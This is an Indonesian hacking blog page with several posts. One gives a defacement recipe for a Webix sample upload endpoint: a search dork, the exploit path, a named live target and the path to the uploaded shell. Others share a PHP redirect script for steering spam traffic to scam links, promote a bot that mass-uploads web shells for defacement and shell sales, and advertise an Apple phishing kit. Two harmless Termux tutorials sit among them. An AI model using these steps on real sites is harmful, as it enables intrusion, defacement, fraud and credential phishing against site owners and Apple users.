Sunday, March 17, 2019

Deface poc Webix Shell Upload Vulnerability

Hallo hallo ekek Kali ini w mau share neh 
Deface poc Webix Shell Upload Vulnerability
Ekekek make tols crsf mang kalem nanti w share 
Mudah pokoknya klik klik croot :"V 
Oke langsung aja simak
dork : v5/webix/samples/21_upload/
Kembangin make otak wibu mu ekkee 
Exploit : /php/photo.php
Jika blank berati vuln 
Contoh 
www.akupengennikah.com/v5/webix/samples/21_upload/
Ekekke kasih exploit 
Blank berarti vuln 
Nah simak aja ini vidionya 
Disini we punya live target 
https//taskfabric.com/
Akses shell ?
/v5/webix/samples/21_upload/php/photos/fileshellmu




Link csrf nya di Sini

Cara melihat info cuaca mengunakan termux

Hallo ketmu lagi dengan saya si ./Roseswilted_ aka ./Pejuangroso wkekkeke
Kali ini saya mau share tutor melihat informasi cuaca yang akhir2 ini lagi ga menentu kek doi heheh kadang dingin kadang juga panas wkkww
Oke .Gan. Oke
Cara melihat informasi cuaca melalui / mengunakan termux oke langsung aja
1. Install termux
2. $ pkg update
3. $ pkg upgrade
4. $ pkg install curl
5. $ curl http://wttr.in/nama_kota
Example curl http://wttr.in/Yogyakarta


  • Ekkee oke semoga memabntu terimakasih


Cara memutar musik YouTube di termux

Hallo agan2 Kali ini saya mau share Cara muter musik lewat YouTube ekekek ngirit kouta sekali :"V
Oke langsung aja ke tourialnya
Ikuti langkah2 nya mang  ekekke
Copy paste aja biar ga bingung
1.download termux
2. $ apt update
2. $ apt upgrade
3 $ pkg update
4. $ pkg upgrade
5. $ pkg install python
6. $ pip install mps_youtube
7. $ pip install youtube_dl
8. $ pkg install mpv
9. $ mpsyt
Nah jika sudah seperti gambar di bawah ini
Lalu untuk mencari musiknya gmana bang ? Oke kek gini
10. $ search nama_lagu.mp3
Nah nanti bakal kek gini
Jika sudah langsung aja kek gini
Misal w milih 37 Alan walker walker berarti langsung aja ketik 37 trus entr maka jadinya kek gini

Nah done mantep bukan ekekke
Bisa diminimaklan juga jadi ga ribet ekkeke
Yaudah skian dari saya jangan Lupa klik ikaln 3 Kali Dan share ekeke biar smua temen mu juga Tau jurusmu
Terimaksih

Thursday, March 14, 2019

Script redirect PHP

Script redirect PHP ,
Buat kalian neh lebih tepatnya spammer yang sering site nya kena rf mulu bisa coba make script redirect ini
Caranya copy paste di bawah ini

# ROCODE GANTI NAMAMU BIAR PRO

$url = "https://javaghost.net/xnxx.html";

if(!$url){
echo "Please Enter Valid Url!";
}else{
header("location:$url");
}

# MPESSH AHHAHAHAH
# GAGAGAGAGGAGAG
?>
Terus paste di netopad mu
Edit bagian url nya jadi link scam mu
Simpan pake ext.php
TerimaTERIM kasih

Bot auto xploiter di termux auto upload shell

  1. Hallo pala dispenser nolep ekekek blm pada bosen apa depesnya ? Perasaan gitu2 mulu ekek oke lah berhubung banyak yang nanya kenapa sih dia zone-h nya bisa penuh padahal bentr bangt gila emang dia pro bgt wkwkwkw , jadi gini gan kebanyakan masatah2 yang jone-h nya banyak itu ngebot mereka , jadi tinggal grap list trus jalanin bot auto dpt shell ekekke ga ribet lagi mikir '="or' admin admin adlog dll ekekke 
  • Nah jadi ini solusinya buat kalian yang mau spam zone-h atau mau buat jualan shell ekeke bisa langsung hubungin saya kalo mau jualan shell , 
  • Nah langsung aja coba toolsnya caranya gini 
  • Dwonload termux 
  • Di playstore Ada jangan manja 
  • Buka termux 
  • Copy paste aja command ini
  • $pkg update 
  • $pkg upgrade
  • $apt install python
  • $apt install python2 
  • $cd /sdcard 
  • $cd file mu di taruh dimana 
  • python2 exploit.py 
  • python2 exploit.py 2 
  • Oke untuk file nya bisa di download di Mari
  • Sentuh Aku mas
  • Oke sekian terimaksh

Script scampage apple FROSTB1T3_V1.3.1_LagiLagiFixBin

Hallo hallo lagi pada sibuk ya nyari script scampage apple :"V
Ekke kali ini gw mau kenalin neh Sapa tau mint script scampage apple FROSTB1T3_V1.3.1_LagiLagiFixBin
Wadow mantap :"V ekekke untuk pemakainya ENAK
Berpanel juga loh Ada dua fitur juga
1.account locked
2.cacel payment ( pembayaran)
Oke untuk panelnya seperti ini
Nah password panel bisa di ganti juga
Trus email rest juga dll pokonya , minat ? Bisa langsung pm saya muehue
di Sini
Oke TERIMAKASIH